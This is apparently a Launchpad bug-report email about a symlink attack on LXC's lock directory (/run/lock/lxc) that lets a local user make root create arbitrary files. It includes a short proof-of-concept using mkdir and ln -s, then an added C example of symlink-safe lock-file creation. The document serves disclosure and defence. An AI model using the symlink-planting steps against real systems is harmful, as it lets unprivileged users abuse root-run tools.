It is worth noting that I typoed the CVE ID in the changelog. CVE-2015-1131 should have been CVE-2015-1331.
** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1334

** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

-- 
https://bugs.launchpad.net/bugs/1470842

Title:
  lxc tools lock handling vulnerable to symlink attack

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found, that when lxc
  tools, e.g. lxc-info, are run as user root, a symlink attack on
  /run/lock/lxc can be used to create arbitrary files as the root user.

  The malicious user has to set up the symlink attack before
  /run/lock/lxc/ exists, which is only possible prior to the
  administrator creating the first container or automatic startup
  starting after boot starting one.

  PoC:

  $ mkdir -p /run/lock/lxc/var/lib/lxc
  $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
  $ stat /test
  stat: cannot stat ‘/test’: No such file or directory
  $ sudo lxc-create --name somename --template download # An admin would run this command
  ...
  Distribution: ubuntu
  Release: trusty
  Architecture: amd64
  ...
  $ stat /test
    File: ‘/test’
    Size: 0          Blocks: 0          IO Block: 4096   regular empty file
  Device: fd01h/64769d    Inode: 52559    Links: 1
  Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2015-07-02 10:40:55.703646793 -0500
  Modify: 2015-07-02 10:40:55.703646793 -0500
  Change: 2015-07-02 10:40:55.703646793 -0500
   Birth: -

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: 1.0.7-0ubuntu0.1
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
   *** 1.0.7-0ubuntu0.1 0
          500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       1.0.3-0ubuntu3 0
          500 http://archivexxx/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
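The following is an added example, not part of the bug report and not LXC's code or its fix: one way a root-run tool can create a lock file so that a pre-planted symlink like the one in the PoC is refused rather than followed. The names safe_lock_open and demo, and the temporary paths, are assumptions made for illustration.

```c
/* Added example, not LXC code: lock-file creation that refuses a planted symlink. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open or create lock file `name` inside `dir`.
 * Returns an fd, or -1 with errno set. */
int safe_lock_open(const char *dir, const char *name)
{
    struct stat st;
    int fd, saved, dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0) return -1;       /* dir is missing or is itself a symlink */
    /* Refuse a directory that another user created or can write to. */
    if (fstat(dfd, &st) < 0 || st.st_uid != geteuid() ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd);
        errno = EPERM;
        return -1;
    }
    /* O_NOFOLLOW: a symlink called `name` gives ELOOP; its target is not created. */
    fd = openat(dfd, name, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    saved = errno;
    close(dfd);
    errno = saved;
    return fd;
}

/* Constructed scenario in a private temp dir (left in /tmp afterwards).
 * Returns 0 when the planted symlink is refused, its target stays absent,
 * and an ordinary lock name still opens. */
int demo(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", target[64], link[64];
    int fd;
    if (!mkdtemp(dir)) return 1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/somename", dir);
    if (symlink(target, link) < 0) return 2;
    if (safe_lock_open(dir, "somename") != -1 || errno != ELOOP) return 3;
    if (access(target, F_OK) == 0) return 4;
    if ((fd = safe_lock_open(dir, "othername")) < 0) return 5;
    close(fd);
    return 0;
}

int main(void) { return demo(); }
```

O_NOFOLLOW only covers the final path component, so the helper checks the lock directory itself but still assumes its parent directories are not attacker-controlled; the ownership and mode test is what rejects a directory that an unprivileged user created first under a world-writable parent.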

